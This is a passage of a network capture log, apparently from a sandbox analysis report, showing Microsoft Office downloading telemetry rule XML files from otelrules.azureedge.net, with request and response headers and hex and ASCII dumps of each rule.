2024-11-15 13:10:12 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:12 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 598b0884-401e-005b-48af-369c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-16547b76f7fxdzxghC1DFWmf7n0000000ncg000000000mh8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:12 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:12 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:12 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:12 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 46cd4d21-b01e-0097-7b90-364f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131012Z-16547b76f7f9bs6dhC1DFWt3rg0000000n1g00000000f3c1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:12 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:12 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:12 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:12 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 840ef35f-001e-000b-44a8-3615a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131012Z-16547b76f7flf9g6hC1DFWmcx80000000am000000000h7v0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:12 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:12 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:12 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:12 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 49ec1b2f-d01e-00ad-3aaf-36e942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131012Z-16547b76f7fffb7lhC1DFWdsxg00000001mg00000000108h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:12 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:12 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:13 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:12 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 05e9aefb-801e-00ac-4740-36fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131012Z-16547b76f7fd4rc5hC1DFWkzhw00000001p0000000007h5s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:13 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:12 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:12 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 11343522-e01e-0085-0240-36c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131012Z-16547b76f7fmbrhqhC1DFWkds80000000n3g00000000fh7g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:13 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:13 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:13 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:13 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 0f1e6d84-801e-007b-5baf-36e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131013Z-1866b5c5fbbg6vdshC1DFW20h800000001bg00000000dtu9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:13 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:13 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:13 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:13 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 0f1e6d88-801e-007b-5eaf-36e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131013Z-1866b5c5fbbstkfjhC1DFWhdyg00000001fg000000003415 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:13 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:13 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:13 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:13 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131013Z-16547b76f7f67wxlhC1DFWah9w0000000n8g0000000005rt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:13 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:13 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:14 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:13 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: a14a0ed7-201e-0096-78aa-31ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131013Z-16547b76f7f9bs6dhC1DFWt3rg0000000n3000000000brzc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:14 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:13 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:14 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:14 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131014Z-16547b76f7f9s8x7hC1DFWywrg000000010000000000h0bv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:14 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:14 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:14 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:14 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 74785e04-801e-00ac-6ff8-36fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131014Z-164f84587bf2rt9xhC1DFW8drg0000000140000000009cas x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
